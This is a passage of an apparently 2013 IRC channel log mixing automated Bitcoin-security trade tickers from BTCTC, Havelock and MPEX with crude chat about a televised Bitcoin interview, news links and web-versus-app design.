26 13:31:32 [BTCTC] [ACTIVEMINING] 7 @ 0.004314 = 0.0302 BTC [+] Jul 26 13:31:48 [MPEX] [S.MPOE] 22200 @ 0.00079922 = 17.7427 BTC [-] Jul 26 13:31:55 !t m S.MG Jul 26 13:31:55 [MPEX:S.MG] 1D: 0.00024 / 0.00024476 / 0.00025 (19100 shares, 4.68 BTC), 7D: 0.000185 / 0.00023218 / 0.000295 (1247665 shares, 289.69 BTC), 30D: 0.00012451 / 0.00021941 / 0.0004 (2073543 shares, 454.96 BTC) Jul 26 13:31:57 [HAVELOCK] [SMG] 73 @ 0.00026999 = 0.0197 BTC [+] Jul 26 13:32:15 !t h S.MG Jul 26 13:32:16 Hell, ain't we about more fucked than a whore at closin' time, huh? Jul 26 13:32:24 !t h SMG Jul 26 13:32:26 [HAVELOCK:SMG] 1D: 0.00025401 / 0.00025909 / 0.00027999 (22939 shares, 5.94337810 BTC), 7D: 0.00024000 / 0.00028347 / 0.00044998 (435816 shares, 123.54101583 BTC), 30D: 0.00009500 / 0.00033643 / 0.00095000 (589988 shares, 198.49044479 BTC) Jul 26 13:38:27 [HAVELOCK] [SDSTM] 3 @ 0.00851 = 0.0255 BTC [+] Jul 26 13:44:24 [HAVELOCK] [SDSTM] 2 @ 0.00850001 = 0.017 BTC [-] Jul 26 13:45:24 [BTCTC] [BMF] 1 @ 0.036 BTC [-] Jul 26 13:45:24 [BTCTC] [BMF] 4 @ 0.03632 = 0.1453 BTC [+] Jul 26 13:45:24 [BTCTC] [BMF] 20 @ 0.0399 = 0.798 BTC [+] Jul 26 13:49:04 [BTCTC] [ACTIVEMINING] 8 @ 0.004299 = 0.0344 BTC [-] Jul 26 13:51:40 [BTCTC] [RSM] 3 @ 0.013 = 0.039 BTC [-] Jul 26 13:51:41 [BTCTC] [RSM] 100 @ 0.013 = 1.3 BTC [-] Jul 26 13:51:43 [BTCTC] [RSM] 5 @ 0.0121 = 0.0605 BTC [-] Jul 26 13:51:45 [BTCTC] [RSM] 100 @ 0.0121 = 1.21 BTC [-] Jul 26 13:52:19 [HAVELOCK] [SDSTM] 140 @ 0.0085 = 1.19 BTC [-] Jul 26 13:52:22 [HAVELOCK] [SDSTM] 337 @ 0.00832 = 2.8038 BTC [-] Jul 26 13:56:29 [BTCTC] [RSM] 1 @ 0.012 BTC [-] Jul 26 13:56:31 [BTCTC] [RSM] 21 @ 0.01161 = 0.2438 BTC [-] Jul 26 13:56:52 [HAVELOCK] [SDSTM] 1 @ 0.00866 BTC [+] Jul 26 14:02:02 [HAVELOCK] [SDSTM] 10 @ 0.00867 = 0.0867 BTC [+] Jul 26 14:03:22 [HAVELOCK] [SDSTM] 139 @ 0.00868 = 1.2065 BTC [+] Jul 26 14:05:12 [BTCTC] [BMF] 50 @ 0.0399 = 1.995 BTC [+] Jul 26 14:05:16 burnside: are you here? Jul 26 14:05:31 ;;slap BigBitz|wrk Jul 26 14:06:25 or someone else, I am perhaps being stupid but..... I can only see one of my stocks :( Jul 26 14:07:29 [BTCTC] [ACTIVEMINING] 92 @ 0.004299 = 0.3955 BTC [-] Jul 26 14:07:31 [BTCTC] [ACTIVEMINING] 293 @ 0.004299 = 1.2596 BTC [-] Jul 26 14:07:32 [BTCTC] [ACTIVEMINING] 12500 @ 0.0043 = 53.75 BTC [+] Jul 26 14:08:02 [MPEX] [S.MPOE] 1950 @ 0.00079922 = 1.5585 BTC [-] Jul 26 14:08:41 [BTCTC] [BFMINES] 21 @ 0.003201 = 0.0672 BTC [-] Jul 26 14:09:25 [BTCTC] [ACTIVEMINING] 13 @ 0.004315 = 0.0561 BTC [+] Jul 26 14:10:31 Yeah I only see one of my assets. Jul 26 14:11:11 [HAVELOCK] [SDSTM] 43 @ 0.0084 = 0.3612 BTC [-] Jul 26 14:11:14 [HAVELOCK] [SDSTM] 57 @ 0.00834 = 0.4754 BTC [-] Jul 26 14:15:48 [BTCTC] [ACTIVEMINING] 59 @ 0.004298 = 0.2536 BTC [-] Jul 26 14:16:15 burnside: you around? Jul 26 14:16:15 [BTCTC] [ACTIVEMINING] 40 @ 0.004201 = 0.168 BTC [-] Jul 26 14:17:02 [BTCTC] [BASIC-MINING] 1 @ 0.5175 BTC [+] Jul 26 14:18:14 BigBitz|wrk he gets around occasionally. Jul 26 14:19:25 Cool, thanks. Jul 26 14:21:07 [BTCTC] [ACTIVEMINING] 143 @ 0.004314 = 0.6169 BTC [+] Jul 26 14:21:29 [BTCTC] [TAT.ASICMINER] 1 @ 0.04552 BTC [-] Jul 26 14:22:22 [BTCTC] [KENILWORTH] 5 @ 0.0018 = 0.009 BTC [-] Jul 26 14:24:08 You are more likely to reach him through the forums Jul 26 14:24:42 [BTCTC] [BTC-BOND] 14 @ 0.009997 = 0.14 BTC [+] Jul 26 14:24:54 [BTCTC] [TAT.MINIGAME] 20 @ 0.000275 = 0.0055 BTC [+] Jul 26 14:26:24 [BTCTC] [ASICMINER-PT] 2 @ 4.616 = 9.232 BTC [+] Jul 26 14:26:40 [BTCTC] [ASICMINER-PT] 4 @ 4.669 = 18.676 BTC [+] Jul 26 14:26:42 [BTCTC] [ASICMINER-PT] 9 @ 4.67 = 42.03 BTC [+] Jul 26 14:26:44 [BTCTC] [ASICMINER-PT] 5 @ 4.689 = 23.445 BTC [+] Jul 26 14:27:00 [BTCTC] [BITVPS] 1 @ 0.001975 BTC [+] Jul 26 14:27:25 [BTCTC] [ASICMINER-PT] 2 @ 4.616 = 9.232 BTC [-] Jul 26 14:27:27 [BTCTC] [ASICMINER-PT] 3 @ 4.615 = 13.845 BTC [-] Jul 26 14:28:22 [BTCTC] [RSM] 2 @ 0.01447 = 0.0289 BTC [+] Jul 26 14:28:32 [BTCTC] [ASICMINER-PT] 8 @ 4.625 = 37 BTC [+] Jul 26 14:31:52 [BTCTC] [ACTIVEMINING] 225 @ 0.004314 = 0.9707 BTC [+] Jul 26 14:38:45 [BTCTC] [ACTIVEMINING] 1 @ 0.004313 BTC [-] Jul 26 14:39:19 [BTCTC] [KENILWORTH] 400 @ 0.0018 = 0.72 BTC [-] Jul 26 14:45:01 [HAVELOCK] [AM100] 4 @ 0.0431 = 0.1724 BTC [-] Jul 26 14:45:04 [HAVELOCK] [AM100] 123 @ 0.0430001 = 5.289 BTC [-] Jul 26 14:45:06 [HAVELOCK] [AM100] 1 @ 0.04291011 BTC [-] Jul 26 14:45:08 [HAVELOCK] [AM100] 99 @ 0.04290101 = 4.2472 BTC [-] Jul 26 14:45:22 [HAVELOCK] [AM100] 2 @ 0.0429 = 0.0858 BTC [-] Jul 26 14:45:22 [HAVELOCK] [AM100] 1 @ 0.0429 BTC [-] Jul 26 14:45:27 [HAVELOCK] [AM100] 318 @ 0.04280001 = 13.6104 BTC [-] Jul 26 14:48:20 cya assbot Jul 26 14:49:37 assbot can't handle fractional share action Jul 26 14:50:23 what will assbot do when we are pushing billions of bitcoins per second? Jul 26 14:52:52 lol Jul 26 14:57:19 prolly some aggregation is in order Jul 26 14:58:52 twas a large selloff of AM100, from 431 to 400 Jul 26 15:01:07 not large in bitcoin, but a lot of orders at once, maybe Havelock could batch in 5 orders at a time or such, with 1 second delay, or whatever threshold is for a flood Jul 26 15:03:09 probably something that assbot should do rather than the exchanges Jul 26 15:03:17 just add stuff together per intervals. Jul 26 15:03:35 kakobrekla you feel like coding ? :D Jul 26 15:03:36 yeah Jul 26 15:09:05 . Jul 26 15:13:27 lucif has a casino now https://caesarbit.eu/ Jul 26 15:14:50 nice, tits. Jul 26 15:17:43 w47 Jul 26 15:46:33 http://9to5mac.com/2013/07/26/la-unified-school-district-will-give-each-of-its-640000-kids-ipads-by-the-end-of-next-year/ Jul 26 15:46:35 LA Unified School District will give each of its 640,000 kids iPads by the end of next year | 9to5Ma Jul 26 15:46:57 http://www.reuters.com/article/2013/07/26/us-gulf-spill-halliburton-idUSBRE96O1HF20130726 Jul 26 15:47:00 Halliburton pleads guilty to destroying Gulf spill evidence Jul 26 15:47:11 "The government said Halliburton's guilty plea is the third by a company over the spill and requires the world's second-largest oilfield services company to pay a maximum $200,000 statutory fine." Jul 26 16:01:15 I need my assbot Jul 26 16:02:23 BTCT does have a realtime ticker Jul 26 16:02:35 Bitfunder has its own irc chan and bot Jul 26 16:02:45 so we're just missing mpex and havelock Jul 26 16:02:58 Yes I know but Its nice to have my irc client up and two other webpages going Jul 26 16:03:11 agreed Jul 26 16:13:55 [BTCTC] [ACTIVEMINING] 6 @ 0.00433 = 0.026 BTC [-] Jul 26 16:14:45 [HAVELOCK] [AM100] 5 @ 0.0432 = 0.216 BTC [+] Jul 26 16:16:55 [HAVELOCK] [AM100] 10 @ 0.0432 = 0.432 BTC [+] Jul 26 16:17:59 [BTCTC] [COGNITIVE] 2 @ 0.729 = 1.458 BTC [+] Jul 26 16:20:24 [BTCTC] [BASIC-MINING] 1 @ 0.515 BTC [-] Jul 26 16:21:14 [HAVELOCK] [AM100] 1 @ 0.0432 BTC [+] Jul 26 16:22:18 [BTCTC] [TAT.ASICMINER] 2 @ 0.04579 = 0.0916 BTC [+] Jul 26 16:22:55 [HAVELOCK] [AM100] 38 @ 0.0432 = 1.6416 BTC [+] Jul 26 16:22:57 [HAVELOCK] [AM100] 2 @ 0.043 = 0.086 BTC [-] Jul 26 16:23:00 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.003189 = 0.0064 BTC [+] Jul 26 16:23:01 [BTCTC] [ASICMINER-PT] 1 @ 4.651 BTC [-] Jul 26 16:23:03 [BTCTC] [ASICMINER-PT] 1 @ 4.65 BTC [-] Jul 26 16:23:25 [BTCTC] [COGNITIVE] 12 @ 0.6511 = 7.8132 BTC [-] Jul 26 16:23:27 [BTCTC] [COGNITIVE] 1 @ 0.651 BTC [-] Jul 26 16:23:28 [BTCTC] [COGNITIVE] 1 @ 0.6505 BTC [-] Jul 26 16:23:31 [BTCTC] [COGNITIVE] 1 @ 0.65 BTC [-] Jul 26 16:26:36 [BTCTC] [BMF] 100 @ 0.04 = 4 BTC [+] Jul 26 16:27:06 [BTCTC] [PAJKA.BOND] 1 @ 0.038 BTC [+] Jul 26 16:28:39 [HAVELOCK] [SMG] 29 @ 0.0002699 = 0.0078 BTC [-] Jul 26 16:28:41 [HAVELOCK] [SDSTM] 1 @ 0.00945 BTC [+] Jul 26 16:28:44 [MPEX] [S.MPOE] 10000 @ 0.00077451 = 7.7451 BTC [-] Jul 26 16:29:04 [BTCTC] [ACTIVEMINING] 140 @ 0.004257 = 0.596 BTC [-] Jul 26 16:29:19 [BTCTC] [ACTIVEMINING] 90 @ 0.004334 = 0.3901 BTC [+] Jul 26 16:29:34 [BTCTC] [BASIC-MINING] 2 @ 0.53 = 1.06 BTC [+] Jul 26 16:31:14 [HAVELOCK] [SDSTM] 1 @ 0.0085 BTC [-] Jul 26 16:31:16 [HAVELOCK] [SDSTM] 1 @ 0.00845 BTC [-] Jul 26 16:31:19 [HAVELOCK] [SDSTM] 2 @ 0.0083111 = 0.0166 BTC [-] Jul 26 16:31:21 [BTCTC] [KENILWORTH] 15 @ 0.001772 = 0.0266 BTC [-] Jul 26 16:31:40 [BTCTC] [ASICMINER-PT] 1 @ 4.645 BTC [-] Jul 26 16:32:03 [BTCTC] [TAT.ASICMINER] 20 @ 0.04503 = 0.9006 BTC [-] Jul 26 16:32:46 [BTCTC] [TAT.MINIGAME] 5 @ 0.000272 = 0.0014 BTC [-] Jul 26 16:34:32 [BTCTC] [ACTIVEMINING] 200 @ 0.004333 = 0.8666 BTC [-] Jul 26 16:34:48 [BTCTC] [BMF] 1 @ 0.045 BTC [+] Jul 26 16:36:35 [BTCTC] [ACTIVEMINING] 40 @ 0.004334 = 0.1734 BTC [+] Jul 26 16:38:30 [BTCTC] [ACTIVEMINING] 13 @ 0.004334 = 0.0563 BTC [+] Jul 26 16:41:02 [BTCTC] [ASICMINER-PT] 9 @ 4.645 = 41.805 BTC [-] Jul 26 16:46:43 [BTCTC] [ACTIVEMINING] 30 @ 0.004333 = 0.13 BTC [-] Jul 26 16:48:48 fucking gox. Jul 26 16:48:52 ? Jul 26 16:49:41 [BTCTC] [COGNITIVE] 4 @ 0.7197 = 2.8788 BTC [+] Jul 26 16:56:29 [BTCTC] [B.YABMC] 1 @ 0.002829 BTC [-] Jul 26 16:57:58 [HAVELOCK] [HIM] 1 @ 0.209 BTC [-] Jul 26 16:58:32 [HAVELOCK] [AM100] 10 @ 0.04350001 = 0.435 BTC [+] Jul 26 16:59:08 [HAVELOCK] [SMG] 21 @ 0.0002699 = 0.0057 BTC [-] Jul 26 16:59:32 http://stream.marketwatch.com/story/markets/SS-4-4/SS-4-34638/ Jul 26 16:59:33 I walked into a bar and watched as people swapped thousands of dollars for bitcoins - MarketWatch.co Jul 26 17:01:00 [HAVELOCK] [AM100] 5 @ 0.04350001 = 0.2175 BTC [+] Jul 26 17:01:50 [BTCTC] [KENILWORTH] 25 @ 0.0018 = 0.045 BTC [+] Jul 26 17:02:14 [HAVELOCK] [AM100] 2 @ 0.04150001 = 0.083 BTC [-] Jul 26 17:02:33 [HAVELOCK] [AM100] 3 @ 0.0415 = 0.1245 BTC [-] Jul 26 17:02:38 mjr_ cool going Jul 26 17:03:04 slowly but surely Jul 26 17:03:09 [BTCTC] [ASICMINER-PT] 2 @ 4.636 = 9.272 BTC [-] Jul 26 17:03:22 [BTCTC] [B.YABMC] 1 @ 0.002829 BTC [-] Jul 26 17:03:25 LA met up again last night Jul 26 17:03:39 [BTCTC] [ACTIVEMINING] 2 @ 0.004333 = 0.0087 BTC [-] Jul 26 17:04:28 [BTCTC] [LTC-ATF.B2] 134 @ 0.01023 = 1.3708 BTC [-] Jul 26 17:04:58 [HAVELOCK] [SMG] 94 @ 0.0002699 = 0.0254 BTC [-] Jul 26 17:05:12 [BTCTC] [B.YABMC] 41 @ 0.00283 = 0.116 BTC [+] Jul 26 17:06:14 [BTCTC] [BASIC-MINING] 1 @ 0.5201 BTC [-] Jul 26 17:07:07 [BTCTC] [ACTIVEMINING] 634 @ 0.004333 = 2.7471 BTC [-] Jul 26 17:07:09 [BTCTC] [ACTIVEMINING] 2966 @ 0.004334 = 12.8546 BTC [+] Jul 26 17:07:50 [BTCTC] [ACTIVEMINING] 100 @ 0.004334 = 0.4334 BTC [+] Jul 26 17:09:20 [BTCTC] [TAT.ASICMINER] 3 @ 0.04579 = 0.1374 BTC [+] Jul 26 17:10:12 [BTCTC] [ASICMINER-PT] 2 @ 4.636 = 9.272 BTC [-] Jul 26 17:10:14 [BTCTC] [ASICMINER-PT] 3 @ 4.635 = 13.905 BTC [-] Jul 26 17:11:27 [BTCTC] [ASICMINER-PT] 2 @ 4.635 = 9.27 BTC [-] Jul 26 17:12:31 [BTCTC] [ASICMINER-PT] 1 @ 4.626 BTC [-] Jul 26 17:16:16 [BTCTC] [ASICMINER-PT] 10 @ 4.625 = 46.25 BTC [-] Jul 26 17:16:57 [HAVELOCK] [SMG] 150 @ 0.0002699 = 0.0405 BTC [-] Jul 26 17:18:47 [BTCTC] [ASICMINER-PT] 7 @ 4.625 = 32.375 BTC [-] Jul 26 17:20:16 [BTCTC] [ASICMINER-PT] 1 @ 4.66 BTC [+] Jul 26 17:20:57 [BTCTC] [ACTIVEMINING] 4 @ 0.004334 = 0.0173 BTC [+] Jul 26 17:23:21 [HAVELOCK] [AM100] 10 @ 0.04155 = 0.4155 BTC [+] Jul 26 17:26:38 [BTCTC] [ASICMINER-PT] 1 @ 4.679 BTC [+] Jul 26 17:33:56 [BTCTC] [ACTIVEMINING] 14 @ 0.004334 = 0.0607 BTC [+] Jul 26 17:35:10 [BTCTC] [BASIC-MINING] 1 @ 0.5299 BTC [+] Jul 26 17:40:17 amir on RT right now Jul 26 17:40:52 http://rt.com/on-air/ Jul 26 17:41:53 i was more bemoaning that fact Jul 26 17:43:02 [BTCTC] [ACTIVEMINING] 83 @ 0.004334 = 0.3597 BTC [+] Jul 26 17:43:04 well... if they feed him he will come. Jul 26 17:43:32 [HAVELOCK] [AM100] 10 @ 0.04155 = 0.4155 BTC [+] Jul 26 17:44:47 hahaha Jul 26 17:44:53 good point Jul 26 17:45:34 i'm glad amir made bitcoin Jul 26 17:45:53 lol Jul 26 17:45:55 "can i pat for college with bitcoin" Jul 26 17:46:03 "why do u want to go to college, when there are those free internet sites" Jul 26 17:46:12 lol Jul 26 17:46:12 "i dunno i havent really looked into, why would anyone want to go to college?" Jul 26 17:46:15 lol Jul 26 17:46:16 lol Jul 26 17:46:17 wait. Jul 26 17:46:23 you people are quoting or parodying ? Jul 26 17:46:30 for realsies Jul 26 17:46:36 hm. just the fact i can't tell Jul 26 17:46:41 owait. srsly ?! Jul 26 17:46:41 no f'ing way Jul 26 17:46:46 did he really say that???? Jul 26 17:46:50 this dude is really entertaining Jul 26 17:47:01 he did say that Jul 26 17:47:06 Is this guy a fucking moron? Jul 26 17:47:13 bitcoin is disempowering gangsters he says Jul 26 17:47:15 entertaining, like monkeys drinking their own piss entertaining? Jul 26 17:47:18 i think he wanted to hover around the question Jul 26 17:47:24 random audience member goes "well... i might have been canned, but at least i'm not as stupid as this accident face" Jul 26 17:47:30 HAHAHA Jul 26 17:47:42 mjoiii http://trilema.com/2012/amir-taaki-has-done-and-continues-to-do-huge-disservice-to-anyone-serious-involved-in-bitcoin/ Jul 26 17:47:54 mjr_ yeah. Jul 26 17:47:54 they just zoomed in on his zits Jul 26 17:48:20 i read tits. Jul 26 17:48:29 Damn that's good Jul 26 17:48:37 i think i'm getting a problem with reading. earlier i read handprint " fresh download" as freak doomlord Jul 26 17:48:41 and i was pretty wtf'd. Jul 26 17:48:54 this lady "it's much easier to buy drugs with bitcoin than cash right?" Jul 26 17:48:59 why are people so retarded Jul 26 17:49:20 does she want to know if it's easier to trade bitcoins for drugs than it is to trade bitcoin for dollars ? Jul 26 17:49:27 by now it probably is. Jul 26 17:49:53 how come amir says froo, instead of through Jul 26 17:49:55 hehe Jul 26 17:50:04 esl. Jul 26 17:50:23 this is insane Jul 26 17:50:42 she wants to know if bitcoin would be useful in nicaragua, with no internet Jul 26 17:51:05 well Jul 26 17:51:09 Broadcast is over Jul 26 17:51:11 woot Jul 26 17:51:17 refresh Jul 26 17:51:19 nvm Jul 26 17:51:21 ty Jul 26 17:51:34 they trying hard to cut it off Jul 26 17:51:35 hehe Jul 26 17:52:27 "how does that sit with your cypherpunk anarchist mentality?" Jul 26 17:52:52 i thought he was steampunk Jul 26 17:53:19 [BTCTC] [ACTIVEMINING] 1437 @ 0.004334 = 6.228 BTC [+] Jul 26 17:53:21 [BTCTC] [ACTIVEMINING] 4716 @ 0.00435 = 20.5146 BTC [+] Jul 26 17:53:23 [BTCTC] [ACTIVEMINING] 1000 @ 0.00435 = 4.35 BTC [+] Jul 26 17:53:34 stinkpunk Jul 26 17:54:57 [BTCTC] [ACTIVEMINING] 150 @ 0.0043 = 0.645 BTC [-] Jul 26 17:55:32 lol Jul 26 17:55:42 [HAVELOCK] [HIM] 2 @ 0.209 = 0.418 BTC [-] Jul 26 17:55:54 [HAVELOCK] [HIM] 1 @ 0.195 BTC [-] Jul 26 17:56:15 o its still on Jul 26 17:56:21 yep Jul 26 17:56:35 i prolly missed the good parts eh Jul 26 17:57:02 [BTCTC] [ASICMINER-PT] 1 @ 4.6 BTC [-] Jul 26 17:57:07 i wouldn't bet on that Jul 26 17:57:13 the guy can outdo huimself Jul 26 17:57:20 its over Jul 26 17:57:22 :( Jul 26 17:57:29 the last face.. Jul 26 17:57:33 priceless Jul 26 17:57:45 [BTCTC] [ACTIVEMINING] 582 @ 0.00445 = 2.5899 BTC [+] Jul 26 17:58:04 can we get a new bitcoin jesus plz? Jul 26 17:58:17 jesuscoin Jul 26 17:58:29 or does amir get airtime because they wanna make btc look bad? Jul 26 17:58:33 kakobrekla: http://blogs.marketwatch.com/thetell/2013/07/26/i-walked-into-a-bar-and-watched-as-people-swapped-thousands-of-dollars-for-bitcoins/?mod=mw_streaming_stream Jul 26 17:58:51 better link, also, for anyone who already read it Jul 26 17:58:56 [HAVELOCK] [SDSTM] 5 @ 0.0096 = 0.048 BTC [+] Jul 26 17:58:59 [HAVELOCK] [SDSTM] 5 @ 0.0097 = 0.0485 BTC [+] Jul 26 17:59:06 [HAVELOCK] [SDSTM] 18 @ 0.00975 = 0.1755 BTC [+] Jul 26 17:59:12 [HAVELOCK] [SDSTM] 5 @ 0.0098 = 0.049 BTC [+] Jul 26 17:59:37 [MPEX] [S.MPOE] 25000 @ 0.00077254 = 19.3135 BTC [-] Jul 26 17:59:38 [MPEX] [S.MPOE] 10000 @ 0.00077253 = 7.7253 BTC [-] Jul 26 17:59:43 [HAVELOCK] [SDSTM] 30 @ 0.0098 = 0.294 BTC [+] Jul 26 17:59:50 [MPEX] [S.MPOE] 5000 @ 0.00077252 = 3.8626 BTC [-] Jul 26 17:59:51 [MPEX] [S.MPOE] 23200 @ 0.0007725 = 17.922 BTC [-] Jul 26 18:00:03 Dud reminds me a little of the shoe bomber Jul 26 18:00:09 hahaha Jul 26 18:00:33 poor idiot they trot out for spectacle and he's just happy to get attention. Jul 26 18:00:40 cool mjr_ Jul 26 18:02:30 TSA monetizes: http://www.wired.com/autopia/2013/07/tsa-precheck/ Jul 26 18:03:10 ThickAsThieves they're running out of dough. Jul 26 18:04:38 Quick Ahmed! I need $85 right now or the jihad is off! Jul 26 18:04:44 this is a trend, getting charged for shit you don't want Jul 26 18:05:08 it's the next step after freemium Jul 26 18:05:13 lol nice Jul 26 18:05:22 ya srsly. i suppose the entire system relies on suicide bombers not being able to save 85 bux Jul 26 18:05:29 i am pretty sure that my govt has been charging me for shit i don't want for a while Jul 26 18:05:42 HAPPY SYSADMIN DAY Jul 26 18:05:48 we pay for ads more and more too Jul 26 18:06:12 here is a kinda stupid video http://www.ted.com/talks/paul_kemp_robertson_bitcoin_sweat_tide_meet_the_future_of_branded_currency.html?utm_medium=on.ted.com-twitter&utm_content=addthis-custom&utm_campaign=&source=twitter&utm_source=t.co&awesm=on.ted.com_eg9h#.UfJ4eOPYHoV.twitter Jul 26 18:06:36 that's their business model: create problems and then offer to fix it (for more of your money) Jul 26 18:06:47 i saw that vid Jul 26 18:06:52 ThickAsThieves: and here is something that you will find interesting (also mircea_popescu) Jul 26 18:06:54 http://unitscale.com/mb/bomb-in-the-garden/ Jul 26 18:06:55 jcpham: cool. too bad I'm not one anymore Jul 26 18:06:56 Matthew Butterick: The Bomb in the Garden Jul 26 18:07:01 can't threaten my user to give me gifts Jul 26 18:07:22 pankkake sort of like web antiviruses. Jul 26 18:07:35 the second one is about content monetization, and ads, from the perspective of a designer, he has a cool example of the shit we put up with Jul 26 18:07:41 web antiviruses? :o Jul 26 18:07:58 ransomware is a more extreme example Jul 26 18:08:04 right Jul 26 18:08:10 [BTCTC] [ACTIVEMINING] 300 @ 0.004449 = 1.3347 BTC [-] Jul 26 18:08:12 i think there is a deeper issue with design quality Jul 26 18:08:12 [BTCTC] [ACTIVEMINING] 2418 @ 0.00445 = 10.7601 BTC [+] Jul 26 18:08:13 [BTCTC] [ACTIVEMINING] 382 @ 0.00445 = 1.6999 BTC [+] Jul 26 18:08:19 [HAVELOCK] [AM100] 4 @ 0.0416 = 0.1664 BTC [+] Jul 26 18:08:33 more than one issue really Jul 26 18:08:35 but Jul 26 18:08:36 that was his argument, in his paper Jul 26 18:08:46 that it is structural and comes from two main flaws Jul 26 18:08:59 first, people that aren't good at design, are given a say Jul 26 18:09:12 [HAVELOCK] [AM100] 1 @ 0.0416 BTC [+] Jul 26 18:09:26 this is more compicated than it sounds Jul 26 18:09:37 because when you ask someone what they think about a design Jul 26 18:09:46 what they hear is Jul 26 18:09:59 "find something bad about this" Jul 26 18:10:07 i agree Jul 26 18:10:16 but also, read his article, i think you'll agree with his points Jul 26 18:10:25 [MPEX] [S.MPOE] 3800 @ 0.0007725 = 2.9355 BTC [-] Jul 26 18:10:29 second, there is not enough distinction between UIX and aesthetic Jul 26 18:10:35 i will Jul 26 18:10:38 just ranting Jul 26 18:10:42 :) Jul 26 18:10:45 [HAVELOCK] [SDSTM] 5 @ 0.0087 = 0.0435 BTC [-] Jul 26 18:10:45 np Jul 26 18:10:53 his rant goes deeper than that Jul 26 18:11:06 its basically a cry for the web to maintain relevance Jul 26 18:11:14 i have background in design (identity, layout, typography) Jul 26 18:11:26 his point is that it will die, apps are becoming the new de facto way for people to consume online content Jul 26 18:11:36 you will appreciate his article then Jul 26 18:11:37 that will die too Jul 26 18:11:46 not necessarily Jul 26 18:11:52 apps are much easier to monetize Jul 26 18:11:56 meaning less reliance on ads Jul 26 18:12:00 [BTCTC] [BASIC-MINING] 5 @ 0.53 = 2.65 BTC [+] Jul 26 18:12:13 there will always be consolidation and deconsruction Jul 26 18:12:16 [BTCTC] [BASIC-MINING] 2 @ 0.535 = 1.07 BTC [+] Jul 26 18:12:17 [BTCTC] [KENILWORTH] 2 @ 0.0018 = 0.0036 BTC [+] Jul 26 18:12:20 [BTCTC] [BASIC-MINING] 1 @ 0.538 BTC [+] Jul 26 18:12:22 also, you can control the entirety of your app, you don't have to worry about what your end user will be using Jul 26 18:12:23 apps are evil. Jul 26 18:12:40 most "apps" are actually frontends to a website Jul 26 18:12:44 i can design for ios devices, and know exactly what my users will see Jul 26 18:12:48 yes Jul 26 18:12:53 but i am controlling the user experience Jul 26 18:13:02 as i know exactly how that "website" will be displayed Jul 26 18:13:26 and what about android? Jul 26 18:13:27 not to say that most designers/developers actually take advantage Jul 26 18:13:30 and w RT Jul 26 18:13:35 and blackberry Jul 26 18:13:36 i can also design specifically for android Jul 26 18:13:40 [HAVELOCK] [AM100] 1 @ 0.0416 BTC [+] Jul 26 18:13:43 and know exactly what they will see Jul 26 18:13:47 it's just a rearrangement Jul 26 18:13:54 well the good thing is third-party application which give back some control back to the user Jul 26 18:14:12 i'm saying, on the web, there is a lack of standards Jul 26 18:14:19 and a very poor monetization strategy Jul 26 18:14:19 people dont use the control they have on the web Jul 26 18:14:24 browsers can do things Jul 26 18:14:27 of course they can Jul 26 18:14:29 [BTCTC] [ASICMINER-PT] 10 @ 4.62 = 46.2 BTC [+] Jul 26 18:14:34 oh, there is a standard Jul 26 18:14:35 [HAVELOCK] [AM100] 1 @ 0.0416 BTC [+] Jul 26 18:14:39 just noone gives a shit. Jul 26 18:14:56 unenforced standards can't really be called standards Jul 26 18:15:03 try ignoring ipv4 standards Jul 26 18:15:05 see how far you get Jul 26 18:15:16 try ignoring ios standards for a more applicable example Jul 26 18:15:31 i am completley ignoring ios yeah Jul 26 18:15:34 only on web pages can i say, eh, fuck that, i don't feel like it Jul 26 18:15:39 [HAVELOCK] [SDSTM] 3 @ 0.0096 = 0.0288 BTC [+] Jul 26 18:16:04 there are compromises though Jul 26 18:16:07 that is just because browsers are so smart Jul 26 18:16:12 like what will apple allow? Jul 26 18:16:19 and operating systems are stupid Jul 26 18:16:45 [BTCTC] [ACTIVEMINING] 1 @ 0.00445 BTC [+] Jul 26 18:16:46 [BTCTC] [BMF] 1 @ 0.04 BTC [-] Jul 26 18:18:26 [BTCTC] [TAT.ASICMINER] 40 @ 0.04579 = 1.8316 BTC [+] Jul 26 18:20:18 [BTCTC] [DMS.MINING] 3 @ 0.013 = 0.039 BTC [+] Jul 26 18:26:14 [BTCTC] [ACTIVEMINING] 20 @ 0.004449 = 0.089 BTC [-] Jul 26 18:26:37 [MPEX] [S.MPOE] 1100 @ 0.00077451 = 0.852 BTC [+] Jul 26 18:29:41 [HAVELOCK] [SDSTM] 2 @ 0.00875 = 0.0175 BTC [-] Jul 26 18:29:54 [MPEX] [S.MPOE] 1900 @ 0.00077451 = 1.4716 BTC [+] Jul 26 18:29:55 [MPEX] [S.MPOE] 15700 @ 0.00077522 = 12.171 BTC [+] Jul 26 18:30:54 I gave up trying to make the web pretty because everyone that was willing to pay me wanted to make it ugly Jul 26 18:31:32 [HAVELOCK] [SDSTM] 3 @ 0.00875 = 0.0263 BTC [-] Jul 26 18:31:35 [HAVELOCK] [SDSTM] 5 @ 0.0087 = 0.0435 BTC [-] Jul 26 18:31:37 [HAVELOCK] [SDSTM] 5 @ 0.0086 = 0.043 BTC [-] Jul 26 18:31:39 [HAVELOCK] [SDSTM] 1 @ 0.00851001 BTC [-] Jul 26 18:31:41 [HAVELOCK] [SDSTM] 4 @ 0.00851 = 0.034 BTC [-] Jul 26 18:31:45 [HAVELOCK] [SDSTM] 1 @ 0.00851 BTC [-] Jul 26 18:32:40 [MPEX] [S.MPOE] 9602 @ 0.0007725 = 7.4175 BTC [-] Jul 26 18:34:16 [BTCTC] [TAT.VIRTUALMINE] 21 @ 0.003189 = 0.067 BTC [+] Jul 26 18:34:44 [BTCTC] [ASICMINER-PT] 12 @ 4.6 = 55.2 BTC [-] Jul 26 18:35:37 [BTCTC] [TAT.VIRTUALMINE] 200 @ 0.00319 = 0.638 BTC [+] Jul 26 18:35:37 [BTCTC] [ASICMINER-PT] 1 @ 4.618 BTC [+] Jul 26 18:35:53 [BTCTC] [ASICMINER-PT] 16 @ 4.617 = 73.872 BTC [-] Jul 26 18:37:03 [BTCTC] [ASICMINER-PT] 12 @ 4.6 = 55.2 BTC [-] Jul 26 18:37:22 [BTCTC] [ASICMINER-PT] 4 @ 4.617 = 18.468 BTC [+] Jul 26 18:37:24 [BTCTC] [ASICMINER-PT] 2 @ 4.615 = 9.23 BTC [-] Jul 26 18:39:08 [BTCTC] [TAT.ASICMINER] 2 @ 0.04579 = 0.0916 BTC [+] Jul 26 18:39:21 [HAVELOCK] [AM100] 2 @ 0.04349 = 0.087 BTC [+] Jul 26 18:40:30 [BTCTC] [TAT.ASICMINER] 2 @ 0.04579 = 0.0916 BTC [+] Jul 26 